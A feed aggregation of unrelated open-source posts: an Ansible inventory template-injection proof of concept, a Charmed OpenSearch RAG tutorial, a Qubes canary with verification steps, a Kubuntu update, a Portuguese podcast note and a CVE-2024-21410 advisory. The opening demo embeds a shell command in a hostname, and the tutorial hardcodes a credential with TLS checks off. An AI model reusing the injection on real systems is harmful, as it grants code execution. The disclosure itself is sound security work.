% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml PLAY [all] ************************************************************************************************ TASK [Gathering Facts] ************************************************************************************ fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true} PLAY RECAP ************************************************************************************************ lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0 % ls -alh /tmp/hacked-host -rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host
I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.
11 March, 2024 08:31AM by aida
Large Language Models (LLMs) fall under the category of Generative AI (GenAI), an artificial intelligence type that produces content based on user-defined context. These models undergo training using an extensive dataset composed of trillions of combinations of words from natural language, enabling them to empower interactive and conversational applications across various scenarios.
Renowned LLMs like GPT, BERT, PaLM, and LLaMa can experience performance improvements by gaining access to additional structured and unstructured data. This additional data may include public or internal documents, websites, and various text forms and content. This methodology, termed retrieval-augmented generation (RAG), ensures that your conversational application generates accurate results with contextual relevance and domain-specific knowledge, even in areas where the pertinent facts were not part of the initial training dataset.
RAG can drastically improve the accuracy of an LLM’s responses. See the example below:
Pro is a subscription-based service that offers additional features and functionality to users. For example, Pro users can access exclusive content, receive priority customer support, and more. To become a Pro user, you can sign up for a Pro subscription on our website. Once you have signed up, you can access all of the Pro features and benefits.
Ubuntu Pro is an additional stream of security updates and packages that meet compliance requirements, such as FIPS or HIPAA, on top of an Ubuntu LTS. It provides an SLA for security fixes for the entire distribution (‘main and universe’ packages) for ten years, with extensions for industrial use cases. Ubuntu Pro is free for personal use, offering the full suite of Ubuntu Pro capabilities on up to 5 machines.
This article guides you on leveraging Charmed OpenSearch to maintain a relevant and up-to-date LLM application.
OpenSearch is an open-source search and analytics engine. Users can extend the functionality of OpenSearch with a selection of plugins that enhance search, security, performance analysis, machine learning, and more. This previous article we wrote provides additional details on the comprehensive features of OpenSearch. We discussed the capability of enabling enterprise-grade solutions through Charmed OpenSearch. This blog will emphasise a specific feature pertinent to RAG: utilising OpenSearch as a vector database.
Vector databases allow you to store and index, for example, text documents, rich media, audio, geospatial coordinates, tables, and graphs into vectors. These vectors represent points in N-dimensional spaces, effectively encapsulating the context of an asset. Search tools can look into these spaces using low-latency queries to find similar assets in neighbouring data points. These search tools typically do this by exploiting the efficiency of different methods for obtaining, for example, the k-nearest neighbours (k-NN) from an index of vectors.
In particular, OpenSearch enables this feature with the k-NN plugin and augments this functionality by providing your conversational applications with other essential features, such as fault tolerance, resource access controls, and a powerful query engine.
IIn this section, we provide a practical example of using Charmed OpenSearch in the RAG process as a retrieval tool with an experiment using a Jupyter notebook on top of Charmed Kubeflow to infer an LLM.
1. Deploy Charmed OpenSearch and enable the k-NN plugin. Follow the Charmed OpenSearch tutorial, which is a good starting point. At the end, verify if the plugin is enabled, which is enabled by default:
$ juju config opensearch plugin_opensearch_knn
true
2. Get your credentials. The easiest way to create and retrieve your first administrator credentials is to add a relation between Charmed Opensearch and the Data Integrator Charm, which is also part of the tutorial.
3. Create a vector index for your k-NN index. Now, we can create a vector index for your additional documents encoded into the knn_vectors data type. For simplicity, we will use the opensearch-py client.
from opensearchpy import OpenSearch
os_host = 10.56.118.209
os_port = 9200
os_url = "https://10.56.118.209:9200"
os_auth = ("opensearch-client_7","sqlKjlEK7ldsBxqsOHNcFoSXayDudf30")
os_client = OpenSearch(
hosts = [{'host': os_host, 'port': os_port}],
http_compress = True,
http_auth = os_auth,
use_ssl = True,
verify_certs = False,
ssl_assert_hostname = False,
ssl_show_warn = False
)
os_index_name = "rag-index"
settings = {
"settings": {
"index": {
"knn": True,
"knn.space_type": "cosinesimil"
}
}
}
opensearch_client.indices.create(index=os_index_name, body=settings)
properties={
"properties": {
"vector_field": {
"type": "knn_vector",
"dimension": 384
},
"text": {
"type": "keyword"
}
}
}
opensearch_client.indices.put_mapping(index=os_index_name, body=properties)
4. Aggregate source documents. In this example, we will select a list of web content that we want our application to use as relevant information to provide accurate answers:
content_links = [
https://discourse.ubuntu.com/t/ubuntu-pro-faq/34042
]
5. Load document contents into memory and split the content into chunks. It will allow us to create the embeddings from the selected documents and upload them to the index we created.
from langchain.document_loaders import WebBaseLoader
loader = WebBaseLoader(content_links)
htmls = loader.load()
from langchain.text_splitter import CharacterTextSplitter
text_splitter = CharacterTextSplitter(
chunk_size=500,
chunk_overlap=0,
separator="\n")
docs = text_splitter.split_documents(htmls)
6. Create embeddings for text chunks and store embeddings in the vector index. It will allow us to create the embeddings from the selected documents and upload them to the index we created.
from langchain.embeddings import HuggingFaceEmbeddings
embeddings = HuggingFaceEmbeddings(
model_name="sentence-transformers/all-MiniLM-L12-v2",
encode_kwargs={'normalize_embeddings': False})
from langchain.vectorstores import OpenSearchVectorSearch
docsearch = OpenSearchVectorSearch.from_documents(docs, embeddings,
ef_construction=256,
engine="faiss",
space_type="innerproduct",
m=48, opensearch_url=os_url,
index_name=os_index_name,
http_auth=os_auth,
verify_certs=False)
7. Use the similarity search to retrieve the documents that provide context to your query. The search engine will perform the Approximate k-NN Search, for example, using the cosine similarity formula, and return the relevant documents in the context of your question.
query = """
What is Pro?
"""
similar_docs = docsearch.similarity_search(query, k=2,
raw_response=True,
search_type="approximate_search",
space_type="cosinesimil")
8. Prepare you LLM. We used a simple example using a HugginFace pipeline to load an LLM.
from transformers import AutoTokenizer, AutoModelForCausalLM, pipeline
from langchain.llms import HuggingFacePipeline
model_name="TheBloke/Llama-2-7B-Chat-GPTQ"
model = AutoModelForCausalLM.from_pretrained(
model_name,
cache_dir="model",
device_map='auto'
)
tokenizer = AutoTokenizer.from_pretrained(model_name,cache_dir="llm/tokenizer")
pl = pipeline(
"text-generation",
model=model,
tokenizer=tokenizer,
max_length = 2048.
)
llm = HuggingFacePipeline(pipeline=pl)
9. Create a prompt template. It will define the expectations of the response and specify that we will provide context for an accurate answer.
from langchain import PromptTemplate
question_prompt_template = """
You are a friendly chatbot assistant that responds in a conversational manner to user's questions.
Respond in short but complete answers unless specifically asked by the user to elaborate on something.
Use History and Context to inform your answers.
Context:
---------
{context}
---------
Question: {question}
Helpful Answer:"""
QUESTION_PROMPT = PromptTemplate(
template=question_prompt_template, input_variables=["context", "question"]
)
10. Infer the LLM to answer your question using the context documents retrieved from OpenSearch.
from langchain.chains.question_answering import load_qa_chain
question = "What is Pro?"
chain = load_qa_chain(llm, chain_type="stuff", prompt=QUESTION_PROMPT)
chain.run(input_documents=similar_docs, question=query)
Retrieval-augmented generation (RAG) is a method that enables users to converse with data repositories. It’s a tool that can revolutionise how you access and utilise data, as we showed in our tutorial. With RAG, you can improve data retrieval, enhance knowledge sharing, and enrich the results of your LLMs to give more contextually relevant, insightful responses that better reflect the most up-to-date information in your organisation.
The benefits of better LLMs that can access your knowledge base are as obvious as they are alluring: you gain better customer support, employee training and developer productivity. On top of that, you ensure that your teams get LLM answers and results that reflect accurate, up-to-date policy and information rather than generalised or even outright useless answers.
As we showed, Charmed OpenSearch is a simple and robust technology that can enable RAG capabilities. With it (and our helpful tutorial), any business can leverage RAG to transform their technical or policy manuals and logs into comprehensive knowledge bases.
Charmed OpenSearch is available for the open-source community. Canonical’s team of experts can help you get started with it as the vector database to leverage the power of the k-NN search for your LLM applications at any scale. Contact Canonical if you have questions.
Watch the webinar: Future-proof AI applications with OpenSearch as a vector database
We have published Qubes Canary 038. The text of this canary and its accompanying cryptographic signatures are reproduced below. For an explanation of this announcement and instructions for authenticating this canary, please see the end of this announcement.
---===[ Qubes Canary 038 ]===---
Statements
-----------
The Qubes security team members who have digitally signed this file [1]
state the following:
1. The date of issue of this canary is March 11, 2024.
2. There have been 100 Qubes security bulletins published so far.
3. The Qubes Master Signing Key fingerprint is:
427F 11FD 0FAA 4B08 0123 F01C DDFA 1A3E 3687 9494
4. No warrants have ever been served to us with regard to the Qubes OS
Project (e.g. to hand out the private signing keys or to introduce
backdoors).
5. We plan to publish the next of these canary statements in the first
fourteen days of June 2024. Special note should be taken if no new
canary is published by that time or if the list of statements changes
without plausible explanation.
Special announcements
----------------------
None.
Disclaimers and notes
----------------------
We would like to remind you that Qubes OS has been designed under the
assumption that all relevant infrastructure is permanently compromised.
This means that we assume NO trust in any of the servers or services
which host or provide any Qubes-related data, in particular, software
updates, source code repositories, and Qubes ISO downloads.
This canary scheme is not infallible. Although signing the declaration
makes it very difficult for a third party to produce arbitrary
declarations, it does not prevent them from using force or other means,
like blackmail or compromising the signers' laptops, to coerce us to
produce false declarations.
The proof of freshness provided below serves to demonstrate that this
canary could not have been created prior to the date stated. It shows
that a series of canaries was not created in advance.
This declaration is merely a best effort and is provided without any
guarantee or warranty. It is not legally binding in any way to anybody.
None of the signers should be ever held legally responsible for any of
the statements made here.
Proof of freshness
-------------------
Mon, 11 Mar 2024 01:10:33 +0000
Source: DER SPIEGEL - International (https://www.spiegel.de/international/index.rss)
Jan Marsalek an Agent for Russia? The Double Life of the former Wirecard Executive
The Russian Invasion - A Visit to the Ukrainian Troops in the Trenches on the Front
The Marseille Experiment: Macron Attempts to Save a City Rocked by Drug Violence
How Vladimir Putin Controls the Russians: Everyday Repression and Resignation
A Visit to the Swamp: The Town Made Famous by Neo-Nazi Students
Source: NYT > World News (https://rss.nytimes.com/services/xml/rss/nyt/World.xml)
Israel Finds a Lifeline in the U.A.E. as Its Ties to Arab Countries Fray
Photo of Catherine, Prince of Wales, Manipulated, News Agencies Say
‘It’s a Way of Life’: Women Make Their Mark in the Ukrainian Army
China’s Growth Slows but Xi Jinping Keeps to His Vision
The Colombian Town That Gabriel García Márquez’s Legacy Helped Transform
Source: BBC News (https://feeds.bbci.co.uk/news/world/rss.xml)
Oscars 2024: Oppenheimer and Poor Things scoop early awards
Oscars red carpet fashion: Stars turn on the style
Ukraine criticises Pope's 'white flag' comment
Portugal vote too close to call as far right surges
Six skiers missing near Matterhorn in Swiss Alps
Source: Blockchain.info
000000000000000000007602e7b20b10a857d9222c78a375fe6334613dff2b60
Footnotes
----------
[1] This file should be signed in two ways: (1) via detached PGP
signatures by each of the signers, distributed together with this canary
in the qubes-secpack.git repo, and (2) via digital signatures on the
corresponding qubes-secpack.git repo tags. [2]
[2] Don't just trust the contents of this file blindly! Verify the
digital signatures! Instructions for doing so are documented here:
https://www.qubes-os.org/security/pack/
--
The Qubes Security Team
https://www.qubes-os.org/security/
Source: https://github.com/QubesOS/qubes-secpack/blob/main/canaries/canary-038-2024.txt
-----BEGIN PGP SIGNATURE-----
iQIzBAABCAAdFiEELRdx/k12ftx2sIn61lWk8hgw4GoFAmXuX3AACgkQ1lWk8hgw
4Goh5A//TkwqT8ryJY5ptnaQyrwx7MYC4NlfEe7OayOAxG+LFYQLmV+FOC471/bi
K1zZa4n5tJTGODuGNH/AwVwE02kmNpFSSgkL4KAGWk56OjpmhT27RS5DPYKz1URX
VMi+JD9Z84J4NfbPNtp39z7OoQaYI9GUwHnW45U5gfFduwzVlDvuy0LIjRTtO9Z3
6zWWqGZ1gdOBJZzOM2t8M9UE5suJzhyjBAavKq7yc4UGqHmV4T2AHUzFzCa9b8D1
z1Djo5QJondtcGH2XOZ50/8iEIKBysorjOqaXAjQPhWjxVlm/Bw/zSe5hLnTugcU
sto0wzdBOGWZR/NzC0+x2WxMH31IuRxl/YawrguEiH/Va3j+nsD9OM14kpxNBMc9
UMWhjiN3Qg4rJcH6b7HCd5oafeU/2iHS5XdwOJ/lX4P7B+eV02LFt5mUSPIYFYa6
aIjbyR+GKOveV4AHJgRYwecVA2BNw67Rtx6i9xOZBsQYzRklXJy9AUoqTDni5xlC
Z5/LnLcmxlpsEHgY/T+oMuMfg7TinL+18CTESWVsU+WuWsT4AWO14xVvcp/kWcL4
G9Diq2nMhKAZ+GiikW4vsfj2w8CC5jP2m2cIDSXFVlfFXR7hDgzo/+2R6+vcyMrc
jk8TJrKfkBIFW0NdYk9itFuXTNyq2LmuCw6sKTi2wENuXY6GfsI=
=tRmo
-----END PGP SIGNATURE-----
Source: https://github.com/QubesOS/qubes-secpack/blob/main/canaries/canary-038-2024.txt.sig.marmarek
-----BEGIN PGP SIGNATURE-----
iQIzBAABCgAdFiEE6hjn8EDEHdrv6aoPSsGN4REuFJAFAmXuW1AACgkQSsGN4REu
FJAdAQ/9GxwVG8dw0pdpxJFZpVnD0EdJXYiOMlt7iiC1W0g68Es95naXdKyfjjeZ
VS/RnSrFAGdTGuOFlFXJr/NJHexBYGd+/Z9+VxvPc0geINYDYpE0yoKLoVAp2UrJ
0gc5QEzkIgCgok+9ff3mYfpEGVAVnTJmUIHjagqyaYA3GDqR8i6hj1kMOBHVokcG
zvFdY3UV/RZGD043t0R8j+IwE8SnJUK+pOcbS2ucX0LA+crDbRjJhiJapGm4+MDP
KLLVjg76IsP2jbXoY/0Vvt4HQVHUSw3XVCYtRSVtM3bmpybzBcvWGSykT3D7L8aS
UnRkaqaDQX3UbbGXvL06prEipqW54e54lRbf/juBHLnQqntD6+gIltiyFWM9tdRX
XdAmcoTaZ00GrbN/+99VadF6/OGJu1TyLz6WmKLAdoGY/4C0wS5mSxufquHi1KFV
SJfuqbQZ8TD1QJ7PqPH9cfnf7vHaAW+CsM7yHLjdaCMLdHeXO28Bh5sq6j4l+J/M
vOa8y1WTrdyxdBmeYN5D0fSiMfq+eANiJuAuqIcQNPzf/kpI0V2DDpp7MQZnB03y
Ng/f2Mmo2DOxPq9HwwPTd7PcGjCdjGoE9Xajk0zTzNphEZT2QCDp7+Gkqnm91/KU
ZKeGM9LefgcfkjfcMYq9xIVfZz7uX3RHWSlFqS7KwYiCGJqI1A4=
=Mwb2
-----END PGP SIGNATURE-----
Source: https://github.com/QubesOS/qubes-secpack/blob/main/canaries/canary-038-2024.txt.sig.simon
The purpose of this announcement is to inform the Qubes community that a new Qubes canary has been published.
A Qubes canary is a security announcement periodically issued by the Qubes security team consisting of several statements to the effect that the signers of the canary have not been compromised. The idea is that, as long as signed canaries including such statements continue to be published, all is well. However, if the canaries should suddenly cease, if one or more signers begin declining to sign them, or if the included statements change significantly without plausible explanation, then this may indicate that something has gone wrong. A list of all canaries is available here.
The name originates from the practice in which miners would bring caged canaries into coal mines. If the level of methane gas in the mine reached a dangerous level, the canary would die, indicating to miners that they should evacuate. (See the Wikipedia article on warrant canaries for more information, but bear in mind that Qubes Canaries are not strictly limited to legal warrants.)
Canaries provide an important indication about the security status of the project. If the canary is healthy, it’s a strong sign that things are running normally. However, if the canary is unhealthy, it could mean that the project or its members are being coerced in some way.
Here is a non-exhaustive list of examples:
No, there are many canary-related possibilities that should not worry you. Here is a non-exhaustive list of examples:
In general, it would not be realistic for an organization to exist that never changed, had zero turnover, and never made mistakes. Therefore, it would be reasonable to expect such events to occur periodically, and it would be unreasonable to regard every unusual or unexpected canary-related event as a sign of compromise. For example, if something usual happens with a canary, and we say it was a mistake and correct it, you will have to decide for yourself whether it’s more likely that it really was just a mistake or that something is wrong and that this is how we chose to send you a subtle signal about it. This will require you to think carefully about which among many possible scenarios is most likely given the evidence available to you. Since this is fundamentally a matter of judgment, canaries are ultimately a social scheme, not a technical one.
A PGP signature is a cryptographic digital signature made in accordance with the OpenPGP standard. PGP signatures can be cryptographically verified with programs like GNU Privacy Guard (GPG). The Qubes security team cryptographically signs all canaries so that Qubes users have a reliable way to check whether canaries are genuine. The only way to be certain that a canary is authentic is by verifying its PGP signatures.
If you fail to notice that a canary is unhealthy or has died, you may continue to trust the Qubes security team even after they have signaled via the canary (or lack thereof) that they been compromised or coerced. Falsified canaries could include manipulated text designed to sow fear, uncertainty, and doubt about the security of Qubes OS or the status of the Qubes OS Project.
The following command-line instructions assume a Linux system with git
and gpg
installed. (For Windows and Mac options, see OpenPGP software.)
Obtain the Qubes Master Signing Key (QMSK), e.g.:
$ gpg --fetch-keys https://keys.qubes-os.org/keys/qubes-master-signing-key.asc
gpg: directory '/home/user/.gnupg' created
gpg: keybox '/home/user/.gnupg/pubring.kbx' created
gpg: requesting key from 'https://keys.qubes-os.org/keys/qubes-master-signing-key.asc'
gpg: /home/user/.gnupg/trustdb.gpg: trustdb created
gpg: key DDFA1A3E36879494: public key "Qubes Master Signing Key" imported
gpg: Total number processed: 1
gpg: imported: 1
(For more ways to obtain the QMSK, see How to import and authenticate the Qubes Master Signing Key.)
View the fingerprint of the PGP key you just imported. (Note: gpg>
indicates a prompt inside of the GnuPG program. Type what appears after it when prompted.)
$ gpg --edit-key 0x427F11FD0FAA4B080123F01CDDFA1A3E36879494
gpg (GnuPG) 2.2.27; Copyright (C) 2021 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
gpg> fpr
pub rsa4096/DDFA1A3E36879494 2010-04-01 Qubes Master Signing Key
Primary key fingerprint: 427F 11FD 0FAA 4B08 0123 F01C DDFA 1A3E 3687 9494
Important: At this point, you still don’t know whether the key you just imported is the genuine QMSK or a forgery. In order for this entire procedure to provide meaningful security benefits, you must authenticate the QMSK out-of-band. Do not skip this step! The standard method is to obtain the QMSK fingerprint from multiple independent sources in several different ways and check to see whether they match the key you just imported. For more information, see How to import and authenticate the Qubes Master Signing Key.
Tip: After you have authenticated the QMSK out-of-band to your satisfaction, record the QMSK fingerprint in a safe place (or several) so that you don’t have to repeat this step in the future.
Once you are satisfied that you have the genuine QMSK, set its trust level to 5 (“ultimate”), then quit GnuPG with q
.
gpg> trust
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please decide how far you trust this user to correctly verify other users' keys
(by looking at passports, checking fingerprints from different sources, etc.)
1 = I don't know or won't say
2 = I do NOT trust
3 = I trust marginally
4 = I trust fully
5 = I trust ultimately
m = back to the main menu
Your decision? 5
Do you really want to set this key to ultimate trust? (y/N) y
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: ultimate validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please note that the shown key validity is not necessarily correct
unless you restart the program.
gpg> q
Use Git to clone the qubes-secpack repo.
$ git clone https://github.com/QubesOS/qubes-secpack.git
Cloning into 'qubes-secpack'...
remote: Enumerating objects: 4065, done.
remote: Counting objects: 100% (1474/1474), done.
remote: Compressing objects: 100% (742/742), done.
remote: Total 4065 (delta 743), reused 1413 (delta 731), pack-reused 2591
Receiving objects: 100% (4065/4065), 1.64 MiB | 2.53 MiB/s, done.
Resolving deltas: 100% (1910/1910), done.
Import the included PGP keys. (See our PGP key policies for important information about these keys.)
$ gpg --import qubes-secpack/keys/*/*
gpg: key 063938BA42CFA724: public key "Marek Marczykowski-Górecki (Qubes OS signing key)" imported
gpg: qubes-secpack/keys/core-devs/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 8C05216CE09C093C: 1 signature not checked due to a missing key
gpg: key 8C05216CE09C093C: public key "HW42 (Qubes Signing Key)" imported
gpg: key DA0434BC706E1FCF: public key "Simon Gaiser (Qubes OS signing key)" imported
gpg: key 8CE137352A019A17: 2 signatures not checked due to missing keys
gpg: key 8CE137352A019A17: public key "Andrew David Wong (Qubes Documentation Signing Key)" imported
gpg: key AAA743B42FBC07A9: public key "Brennan Novak (Qubes Website & Documentation Signing)" imported
gpg: key B6A0BB95CA74A5C3: public key "Joanna Rutkowska (Qubes Documentation Signing Key)" imported
gpg: key F32894BE9684938A: public key "Marek Marczykowski-Górecki (Qubes Documentation Signing Key)" imported
gpg: key 6E7A27B909DAFB92: public key "Hakisho Nukama (Qubes Documentation Signing Key)" imported
gpg: key 485C7504F27D0A72: 1 signature not checked due to a missing key
gpg: key 485C7504F27D0A72: public key "Sven Semmler (Qubes Documentation Signing Key)" imported
gpg: key BB52274595B71262: public key "unman (Qubes Documentation Signing Key)" imported
gpg: key DC2F3678D272F2A8: 1 signature not checked due to a missing key
gpg: key DC2F3678D272F2A8: public key "Wojtek Porczyk (Qubes OS documentation signing key)" imported
gpg: key FD64F4F9E9720C4D: 1 signature not checked due to a missing key
gpg: key FD64F4F9E9720C4D: public key "Zrubi (Qubes Documentation Signing Key)" imported
gpg: key DDFA1A3E36879494: "Qubes Master Signing Key" not changed
gpg: key 1848792F9E2795E9: public key "Qubes OS Release 4 Signing Key" imported
gpg: qubes-secpack/keys/release-keys/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key D655A4F21830E06A: public key "Marek Marczykowski-Górecki (Qubes security pack)" imported
gpg: key ACC2602F3F48CB21: public key "Qubes OS Security Team" imported
gpg: qubes-secpack/keys/security-team/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 4AC18DE1112E1490: public key "Simon Gaiser (Qubes Security Pack signing key)" imported
gpg: Total number processed: 17
gpg: imported: 16
gpg: unchanged: 1
gpg: marginals needed: 3 completes needed: 1 trust model: pgp
gpg: depth: 0 valid: 1 signed: 6 trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: depth: 1 valid: 6 signed: 0 trust: 6-, 0q, 0n, 0m, 0f, 0u
Verify signed Git tags.
$ cd qubes-secpack/
$ git tag -v `git describe`
object 266e14a6fae57c9a91362c9ac784d3a891f4d351
type commit
tag marmarek_sec_266e14a6
tagger Marek Marczykowski-Górecki 1677757924 +0100
Tag for commit 266e14a6fae57c9a91362c9ac784d3a891f4d351
gpg: Signature made Thu 02 Mar 2023 03:52:04 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
The exact output will differ, but the final line should always start with gpg: Good signature from...
followed by an appropriate key. The [full]
indicates full trust, which this key inherits in virtue of being validly signed by the QMSK.
Verify PGP signatures, e.g.:
$ cd QSBs/
$ gpg --verify qsb-087-2022.txt.sig.marmarek qsb-087-2022.txt
gpg: Signature made Wed 23 Nov 2022 04:05:51 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
$ gpg --verify qsb-087-2022.txt.sig.simon qsb-087-2022.txt
gpg: Signature made Wed 23 Nov 2022 03:50:42 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
$ cd ../canaries/
$ gpg --verify canary-034-2023.txt.sig.marmarek canary-034-2023.txt
gpg: Signature made Thu 02 Mar 2023 03:51:48 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
$ gpg --verify canary-034-2023.txt.sig.simon canary-034-2023.txt
gpg: Signature made Thu 02 Mar 2023 01:47:52 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
Again, the exact output will differ, but the final line of output from each gpg --verify
command should always start with gpg: Good signature from...
followed by an appropriate key.
For this announcement (Qubes Canary 038), the commands are:
$ gpg --verify canary-038-2024.txt.sig.marmarek canary-038-2024.txt
$ gpg --verify canary-038-2024.txt.sig.simon canary-038-2024.txt
You can also verify the signatures directly from this announcement in addition to or instead of verifying the files from the qubes-secpack. Simply copy and paste the Qubes Canary 038 text into a plain text file and do the same for both signature files. Then, perform the same authentication steps as listed above, substituting the filenames above with the names of the files you just created.
Greetings, Kubuntu enthusiasts! It’s time for our regular community update, and we’ve got plenty of exciting developments to share from the past month. Our team has been hard at work, balancing the demands of personal commitments with the passion we all share for Kubuntu. Here’s what we’ve been up to:
We’re thrilled to announce that we’ve been working closely with Localstack to prepare a joint press release that’s set to be published next week. This collaboration marks a significant milestone for us, and we’re eager to share the details with you all. Stay tuned!
Our Kubuntu Graphic Design contest, initiative is progressing exceptionally well, showcasing an array of exciting contributions from our talented community members. The creativity and innovation displayed in these submissions not only highlight the diverse talents within our community but also contribute significantly to the visual identity and user experience of Kubuntu. We’re thrilled with the participation so far and would like to remind everyone that the contest remains open to applicants until the 31st of March, 2024. This is a wonderful opportunity for designers, artists, and enthusiasts to leave their mark on Kubuntu and help shape its aesthetic direction. If you haven’t submitted your work yet, we encourage you to take part and share your vision with us. Let’s continue to build a visually stunning and user-friendly Kubuntu together
Our search for a new home for the Kubuntu Wiki Support Forum is progressing well. We understand the importance of having a reliable and accessible platform for our users to find support and share knowledge. Rest assured, we’re on track to make this transition as smooth as possible.
In our efforts to ensure the sustainability and growth of Kubuntu, we’re in the process of introducing new donation platforms. Jonathan Riddell is at the helm, working diligently to align our financial controls and operations. This initiative will help us better serve our community and foster further development.
Exciting developments are on the horizon as we collaborate with Kubuntu Focus to curate a new set of developer tools. While we’re not ready to divulge all the details just yet, we’re confident that this partnership will yield invaluable resources for cloud software developers in our community. More information will be shared soon.
We’re happy to report that our efforts to enhance communication within the Kubuntu community have borne fruit. We now have a dedicated Kubuntu Space on Matrix, complete with channels for Development, Discussion, and Support. This platform will make it easier for our community to connect, collaborate, and provide mutual assistance.
The past few weeks have been a whirlwind of activity, both personally and professionally. Despite the challenges, the progress we’ve made is a testament to the dedication and hard work of everyone involved in the Kubuntu project. A special shoutout to Scarlett Moore, Aaron Rainbolt, Rik Mills and Mike Mikowski for their exceptional contributions and to the wider community for your unwavering support. Your enthusiasm and commitment are what drive us forward.
As we look towards the exciting release of Kubuntu 24.04, we’re filled with anticipation for what the future holds. Our journey is far from over, and with each step, we grow stronger and more united as a community. Thank you for being an integral part of Kubuntu. Here’s to the many achievements we’ll share in the days to come!
Stay connected, stay inspired, and as always, thank you for your continued support of Kubuntu.
— The Kubuntu Team
Depois de uma semana intensa a cozinhar gorduras numa roulotte, eis que nos aproximamos a velocidade vertiginosa das primeiras eleições legislativas de 2024 e do fim da democracia. Mas há razões para sermos optimistas: descascámos na falta de jeito da Google; em breve haverá Snaps aos montes para Ubuntu Touch; para quem gosta, o Firefox é bom para gerir uma catrefada de abas e a Nextcloud tem ferramentas mesmo mesmo mesmo boas para vocês descobrirem. Polémica da semana para incendiar as redes sociais com títulos bombásticos e tergiversados: o Diogo odeia a Mozilla!!! \[é falso, mas o que interessa é ganhar cliques, queriam jornalismo, não?\].
Já sabem: oiçam, subscrevam e partilhem!
Podem apoiar o podcast usando os links de afiliados do Humble Bundle, porque ao usarem esses links para fazer uma compra, uma parte do valor que pagam reverte a favor do Podcast Ubuntu Portugal. E podem obter tudo isso com 15 dólares ou diferentes partes dependendo de pagarem 1, ou 8. Achamos que isto vale bem mais do que 15 dólares, pelo que se puderem paguem mais um pouco mais visto que têm a opção de pagar o quanto quiserem. Se estiverem interessados em outros bundles não listados nas notas usem o link https://www.humblebundle.com/?partner=PUP e vão estar também a apoiar-nos.
Este episódio foi produzido por Diogo Constantino, Miguel e Tiago Carrondo e editado pelo Senhor Podcast. O website é produzido por Tiago Carrondo e o código aberto está licenciado nos termos da Licença MIT. A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License. Este episódio e a imagem utilizada estão licenciados nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.
In February 2024, Microsoft issued a security alert for a total of 73 security vulnerabilities. The batch included 6 critical severity vulnerabilities, 52 rated as high severity, and 15 as medium severity vulnerabilities. 30 of them are remote code execution vulnerabilities [T1210] and 16 are privilege escalation [TA0004] exploits. From that group, three stand out as being actively exploited; CVE-2024-21410 (CVSS 9.8 Critical), CVE-2024-21412 (CVSS 8.1 High), and CVE-2024-21351 (CVSS 7.6 High).
15 of the 73 CVEs affected Microsoft WDAC OLE DB provider for SQL, 8 were reported in Microsoft Dynamics, a business productivity cloud service that integrates with Microsoft 365, and the Windows kernel had 6 CVEs reported and patched. The full list of vulnerabilities can be found on the official Microsoft advisory report for February 2024.
CVE-2024-21410 in Microsoft Exchange Actively Exploited
The CVE-2024-21410 (CVSS 9.8 Critical) security flaw is an authentication replay attack [CWE-294] on Microsoft Exchange Servers that use the Net-NTLMv2 protocol. The vulnerability allows attackers with the ability to capture a victim’s Net-NTLMv2 credentials to escalate privileges on the system for unauthenticated access. Since CVE-2024-21410 is a pass-the-hash [CWE-836] vulnerability it is considered low complexity to exploit by any attacker with stolen credentials. As such, CVE-2024-21410 represents a high risk to the confidentiality and integrity of an organization’s internal email communication and other data contained in an Exchange Server instance such as contact lists, shared resources or schedules.
CVE-2024-21410 is reported as actively exploited by CISA’s known exploited vulnerabilities (KEV) database. Although no formal attribution has been assigned to the recent attacks, some insider noted that Russian-backed threat actor APT28 is active in exploiting NTLM and is known for attack techniques including Access Token Manipulation [T1134] and Token Impersonation/Theft [T1134.001] for unauthorized access against email servers.
28,500 Microsoft Exchange servers have been identified as vulnerable, while a report from security research firm Shadowserver aggressively estimates that up to 97,000 IPs are potentially affected. Greenbone provides both a local security check (LSC) and remote version checks for identifying Microsoft Exchange servers impacted by CVE-2024-21410.
Here is a description of CVE-2024-21410 and how it is being exploited:
What Is NTLM Authentication Protocol?
